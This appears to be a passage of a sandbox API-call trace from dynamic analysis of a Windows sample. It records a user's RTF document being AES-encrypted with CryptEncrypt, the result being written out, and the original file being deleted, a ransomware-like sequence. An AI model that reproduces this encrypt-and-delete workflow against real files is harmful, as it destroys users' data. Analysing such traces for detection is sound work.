out: hHeap=0x1780000) returned 1 [0082.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0082.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0082.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x873a) returned 0x49a2750 [0082.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0082.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.225] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x873a) returned 0x499a008 [0082.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0082.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0082.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0082.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0082.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.225] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0082.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0082.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0082.225] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0082.225] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0082.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0082.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0082.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29e0 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x873a) returned 0x499a008 [0082.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2970 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0082.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2980 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0082.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a40 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb318 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x873a) returned 0x49aae98 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0082.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0082.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb090 | out: hHeap=0x1780000) returned 1 [0082.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0082.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0082.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0082.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0082.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0082.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0082.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0082.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0082.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0082.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0082.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0082.227] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0082.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0082.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0082.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0082.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0082.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.228] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0082.228] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.228] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.229] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0082.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0082.229] CryptGetKeyParam (in: hKey=0x41ac000, dwParam=0x7, pbData=0x43e2b20, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2b20*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0082.234] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.234] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.234] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0082.235] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.235] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c37a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0082.235] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x873a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x8740) returned 1 [0082.235] CharLowerBuffW (in: lpsz="byte[34625]", cchLength=0xb | out: lpsz="byte[34625]") returned 0xb [0082.235] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.235] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3b78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0082.235] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b35e0*, pdwDataLen=0x144e088*=0x873a, dwBufLen=0x8740 | out: pbData=0x49b35e0*, pdwDataLen=0x144e088*=0x8740) returned 1 [0082.236] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.236] WriteFile (in: hFile=0x298, lpBuffer=0x49dda58*, nNumberOfBytesToWrite=0x8740, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x49dda58*, lpNumberOfBytesWritten=0x144ea8c*=0x8740, lpOverlapped=0x0) returned 1 [0082.237] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0082.237] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.237] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0082.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cb150, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0082.237] CryptDestroyKey (hKey=0x41ac000) returned 1 [0082.238] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.238] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0082.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0082.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.238] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0082.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0082.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0082.238] CryptReleaseContext (hProv=0x41a48c0, dwFlags=0x0) returned 1 [0082.238] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.238] FreeLibrary (hLibModule=0x756e0000) returned 1 [0082.238] CloseHandle (hObject=0x258) returned 1 [0082.238] CloseHandle (hObject=0x298) returned 1 [0082.242] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\Zjnf2x96GL5i.rtf", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\Zjnf2x96GL5i.rtf", lpFilePart=0x0) returned 0x41 [0082.242] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\Zjnf2x96GL5i.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\zjnf2x96gl5i.rtf")) returned 0x20 [0082.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0082.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0082.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0082.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0082.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0082.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0082.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0082.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0082.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0082.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0082.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0082.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0082.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ba0 [0082.243] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\Zjnf2x96GL5i.rtf", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23232a20, ftCreationTime.dwHighDateTime=0x1d5e463, ftLastAccessTime.dwLowDateTime=0xee16ecf0, ftLastAccessTime.dwHighDateTime=0x1d5ee4d, ftLastWriteTime.dwLowDateTime=0xee16ecf0, ftLastWriteTime.dwHighDateTime=0x1d5ee4d, nFileSizeHigh=0x0, nFileSizeLow=0x873a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Zjnf2x96GL5i.rtf", cAlternateFileName="ZJNF2X~1.RTF")) returned 0x41ac500 [0082.243] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\Zjnf2x96GL5i.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\zjnf2x96gl5i.rtf")) returned 1 [0082.452] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23232a20, ftCreationTime.dwHighDateTime=0x1d5e463, ftLastAccessTime.dwLowDateTime=0xee16ecf0, ftLastAccessTime.dwHighDateTime=0x1d5ee4d, ftLastWriteTime.dwLowDateTime=0xee16ecf0, ftLastWriteTime.dwHighDateTime=0x1d5ee4d, nFileSizeHigh=0x0, nFileSizeLow=0x873a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Zjnf2x96GL5i.rtf", cAlternateFileName="ZJNF2X~1.RTF")) returned 0 [0082.452] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0082.453] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 